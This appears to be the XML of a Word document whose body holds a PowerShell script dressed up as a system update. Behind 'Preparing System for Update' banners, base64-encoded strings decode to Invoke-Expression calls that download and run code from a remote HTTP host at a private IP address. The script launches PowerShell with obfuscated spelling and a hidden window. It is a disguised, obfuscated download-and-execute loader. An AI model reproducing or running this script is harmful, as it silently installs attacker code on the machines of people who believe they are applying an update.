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DF7D" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[!] Preparing System for Update"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DC8FB6" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*] ============================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1081EFAB" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D42F96" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E327DBC" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E72E2" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A1CEC" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1454E4" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09696D" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[!] Starting Update Process."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761E2FB8" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*] ============================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F199DBA" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4DA64" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFADE81" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936F332" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1CBA6E" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528CBB3" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B85A4" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="5FE2C8D5" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>#$a1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xOTIuMTY4LjI0MS4xMzI6ODAwMC9hMScp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F6E92" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>#$r1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xOTIuMTY4LjI0MS4xMzI6ODAwMC9yMScp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E818CB1" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="1AFF17E1" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$a1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xMC4wLjEzLjc1OjgwMDAvYTEnKQ=="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743C158" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$r1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xMC4wLjEzLjc1OjgwMDAvcjEnKQ=="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D2610" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="4989E62A" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FB57F" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="6EF2939D" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$p1 = "UG9XZVJTaEVMbDs7LW5vUCAtYyAi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15DD00" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$p2 = $p1.substring(0,28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC49A7" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="783260DC" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[*]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAC5EB" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4794B8" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo "[!] Update Process Completed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04215A92" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>start-sleep -s 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C531B" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="1E2CF1E7" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$update_p2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48DC25" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$update_a1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F325E3F" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>$update_r1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($r1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A565275" w14:textId="77777777" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058"/>
    <w:p w14:paraId="0CD52BA9" w14:textId="1CA6157E" w:rsidR="00803058" w:rsidRDefault="00803058" w:rsidP="00803058">
      <w:r>
        <w:t>echo $update_a1 | pow""</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ersh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>""ell -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - ; echo $update_r1 | pow""e""</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>""ell -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windowstyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hidden -</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0080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58"/>
    <w:rsid w:val="008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2671"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{836B385F-EA57-7F45-A68B-EBE1594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919443068860</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>919443068860</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-24T19:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-24T19:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>